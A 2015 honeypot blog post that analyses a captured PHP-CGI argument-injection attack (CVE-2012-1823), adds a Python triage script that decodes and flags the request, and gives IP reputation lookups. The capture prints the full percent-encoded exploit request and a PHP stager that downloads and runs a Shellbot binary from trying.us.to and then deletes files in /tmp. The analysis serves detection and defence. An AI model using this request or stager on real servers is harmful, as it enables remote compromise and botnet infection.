Sunday, 1 November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
END OF DATA
We have covered this kind of attack in a previous blog post; we had not seen it since March. The request is the PHP-CGI argument-injection pattern (CVE-2012-1823): the percent-encoded query string is handed to the php-cgi binary as command-line arguments, and the -d overrides it carries (among them allow_url_include=on, disable_functions="", open_basedir=none and, twice, auto_prepend_file=php://input) make PHP execute whatever arrives in the POST body. That body changes to /tmp, tries wget, curl and fetch in turn so that the download works on both Linux and BSD hosts, unpacks seed.jpg (a gzipped tarball despite the extension, since it is fed to tar -xzvf), runs the extracted seed binary, and finally deletes everything in /tmp to remove traces.
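The following Python is an added example, not code from the original post or from the honeypot software behind it. It decodes the captured request line the way a CGI server does (split the query on "+", then percent-decode each word), parses the resulting -d overrides, flags the ones that turn php-cgi into a remote code runner, and pulls the download hosts and dropped file names out of the PHP stager in the POST body. The two sample strings are copied from the capture above (the hex runs are only split across lines for readability); the indicator names and the DANGEROUS_DIRECTIVES table are my own triage conventions, not part of any standard.

```python
"""Decode and triage a PHP-CGI argument-injection request (CVE-2012-1823 pattern)."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: request line and POST body from the honeypot capture above.
SAMPLE_REQUEST_LINE = (
    "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+"
    "%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+"
    "%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+"
    "%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+"
    "%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+"
    "%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+"
    "%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+"
    "%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+"
    "%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+"
    "%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e"
    " HTTP/1.1"
)
SAMPLE_BODY = (
    '<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; '
    'fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>'
)

# php.ini settings which, when overridden via -d, let the request body run as PHP
# (hypothetical triage table, not a PHP or CVE artefact).
DANGEROUS_DIRECTIVES = {
    "auto_prepend_file": lambda v: v.startswith("php://input"),
    "allow_url_include": lambda v: v.lower() in ("on", "1"),
    "safe_mode": lambda v: v.lower() in ("off", "0"),
    "disable_functions": lambda v: v.strip("\"'") == "",
    "open_basedir": lambda v: v.lower() in ("none", ""),
    "cgi.force_redirect": lambda v: v == "0",
    "suhosin.simulation": lambda v: v.lower() in ("on", "1"),
}


def cgi_argv(raw_query):
    """Split a query string into argv the way a CGI server does when the raw
    query holds no literal '=': split on '+', then percent-decode each word."""
    return [unquote(word) for word in raw_query.split("+") if word]


def parse_d_options(argv):
    """Collect '-d key=value' pairs (duplicates kept, in order) plus remaining flags."""
    directives, flags, i = {}, [], 0
    while i < len(argv):
        if argv[i] == "-d" and i + 1 < len(argv):
            key, _, value = argv[i + 1].partition("=")
            directives.setdefault(key, []).append(value)
            i += 2
        else:
            flags.append(argv[i])
            i += 1
    return directives, flags


def triage(request_line, body):
    """Return decoded path, parsed -d directives, indicator names and IOCs."""
    method, target, _version = request_line.split(" ", 2)
    # Split target by hand: urlsplit would read the leading '//' as a netloc.
    raw_path, _, raw_query = target.partition("?")
    path = unquote(raw_path)
    findings = {"method": method, "path": path, "indicators": [], "directives": {}, "iocs": {}}
    if re.search(r"/cgi-bin/php[^/]*$", path):
        findings["indicators"].append("php_cgi_binary_requested")
    # The CVE-2012-1823 evasion: '=' only appears after decoding, so the server
    # treats the query as argv instead of as name=value parameters.
    if "=" not in raw_query and "=" in unquote(raw_query):
        findings["indicators"].append("percent_encoded_equals_in_query")
    directives, flags = parse_d_options(cgi_argv(raw_query))
    findings["directives"] = directives
    for key, values in directives.items():
        check = DANGEROUS_DIRECTIVES.get(key)
        if check and any(check(v) for v in values):
            findings["indicators"].append("dangerous_directive:" + key)
    if "-n" in flags:  # -n: ignore php.ini, so only the -d overrides apply
        findings["indicators"].append("php_ini_ignored")
    if directives.get("auto_prepend_file") and re.search(r"<\?(php)?\s", body):
        findings["indicators"].append("php_code_in_post_body")
    # IOCs from the stager: full URLs, bare hosts given to wget, dropped file names.
    urls = re.findall(r"https?://[^\s\"';]+", body)
    bare = re.findall(r"\bwget\s+(?!https?://)([^\s\"';]+)", body)
    hosts = {urlsplit(u).hostname for u in urls} | {urlsplit("//" + b).hostname for b in bare}
    findings["iocs"] = {
        "urls": sorted(set(urls)),
        "hosts": sorted(h for h in hosts if h),
        "files": sorted(set(re.findall(r"(?:\btar\s+-\S+|\bchmod\s+\+x|\./)\s*(\S+)", body))),
    }
    return findings


def triage_sample():
    """Run the triage over the constructed sample capture."""
    return triage(SAMPLE_REQUEST_LINE, SAMPLE_BODY)


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(key, "=", value)
```

The decoded path comes out as //cgi-bin/php and the argv as a sequence of -d key=value pairs ending in -n; the host list and file names are what you would feed to a blocklist or a retro-hunt over proxy logs. Note that the triage does not touch the network: the sample is a string, so the example can be run anywhere, including on a machine that must never contact trying.us.to.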

195.182.136[.]198

    Static Source: GeoIP data
    Country: Russian Federation
    ASN: AS6858 Comlink Ltd

    Dynamic Source: IBM X-Force Exchange
    Score: 1.4
    Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198

    Dynamic Source: SANS Internet Storm Center (ISC)
    comment: IP is listed on SANS ISC
    comment: This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/195.182.136.198

Feed search for 195.182.136[.]198

5.39.251[.]4

    Static Source: GeoIP data
    Country: United Kingdom
    ASN: AS30938 ahbr company limited

    Dynamic Source: SANS Internet Storm Center (ISC)
    comment: IP is listed on SANS ISC
    comment: This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/5.39.251.4

Feed search for 5.39.251[.]4